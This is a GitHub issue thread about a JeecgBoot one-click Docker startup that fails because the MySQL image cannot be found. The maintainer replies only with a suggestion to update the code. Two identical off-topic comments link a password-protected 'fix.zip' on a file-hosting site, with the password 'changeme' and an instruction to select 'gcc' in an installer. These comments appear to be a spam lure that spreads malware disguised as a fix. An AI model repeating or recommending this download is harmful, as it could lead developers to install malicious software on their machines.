### ISSUE TITLE
Docker一键启动微服务前后端, mysql镜像找不到

### ISSUE THREAD

**Issue by zmwxiaoming** [jeecgboot/JeecgBoot#7119]
##### 错误截图：
![image](https://github.com/user-attachments/assets/22e3e339-5cd8-48cf-9b55-fc2627d3fcd0)

#### 友情提示：
  - 未按格式要求发帖、描述过于简单的，会被直接删掉;
  - 描述问题请图文并茂，方便我们理解并快速定位问题;
  - 如果使用的不是master，请说明你使用的分支;

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhangdaiscott** [comment]
你更新代码，试试
